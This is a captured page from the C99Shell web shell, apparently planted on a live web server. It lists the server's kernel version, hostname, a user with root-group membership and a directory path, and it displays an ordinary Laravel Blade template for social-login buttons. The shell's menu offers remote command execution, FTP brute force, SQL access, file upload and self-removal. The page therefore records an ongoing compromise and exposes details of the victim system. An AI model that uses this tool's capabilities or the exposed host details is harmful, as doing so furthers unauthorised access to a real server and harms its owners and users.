!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 28.29 GB of 117.98 GB (23.98%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     c65ec81155755e4a9de14fd1ca6cfb1b.php (2.67 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div>
    <?php if(config('services.google.active') || config('services.linkedin.active') || config('services.facebook.active') || config('services.twitter.active') || config('services.github.active')): ?>
        <div class="relative text-center mb-6 mt-4 sm:mt-6">
            <div class="relative z-50 px-4 bg-white dark:bg-gray-800 body-sm-400 inline-flex justify-center items-center text-gray-600 dark:text-gray-300">
                Or continue with
            </div>
            <div class="h-[1px] z-10 w-full bg-gray-100 absolute top-1/2 -translate-1/2"></div>
        </div>
        <div class="flex flex-wrap gap-3 items-center">
            <?php if(config('services.google.active') && config('services.google.client_id') && config('services.google.client_secret')): ?>
            <a href="/auth/google/redirect" class="btn-social-login">
                <img src="<?php echo e(asset('frontend/images/google.png')); ?>" alt="">
                <span>Google</span>
            </a>
            <?php endif; ?>
            <?php if(config('services.linkedin.active') && config('services.linkedin.client_id') && config('services.linkedin.client_secret')): ?>
            <a href="/auth/linkedin/redirect" class="btn-social-login">
                <img src="<?php echo e(asset('frontend/images/linkedin.svg')); ?>" alt="">
                <span>Linkedin</span>
            </a>
            <?php endif; ?>
            <?php if(config('services.facebook.active') && config('services.facebook.client_id') && config('services.facebook.client_secret')): ?>
            <a href="/auth/facebook/redirect" class="btn-social-login">
                <img src="<?php echo e(asset('frontend/images/facebook.png')); ?>" alt="">
                <span>Facebook</span>
            </a>
            <?php endif; ?>
            <?php if(config('services.twitter.active') && config('services.twitter.client_id') && config('services.twitter.client_secret')): ?>
            <a href="/auth/twitter/redirect" class="btn-social-login">
                <img src="<?php echo e(asset('frontend/images/twitter.svg')); ?>" alt="">
                <span>Twitter</span>
            </a>
            <?php endif; ?>
            <?php if(config('services.github.active') && config('services.github.client_id') && config('services.github.client_secret')): ?>
            <a href="/auth/github/redirect" class="btn-social-login">
                <img src="<?php echo e(asset('frontend/images/github.svg')); ?>" alt="">
                <span>Github</span>
            </a>
            <?php endif; ?>
        </div>
    <?php endif; ?>
</div>
<?php /**PATH E:\add listing 8-9-25\addListing\resources\views/components/frontend/social-login.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0031 ]--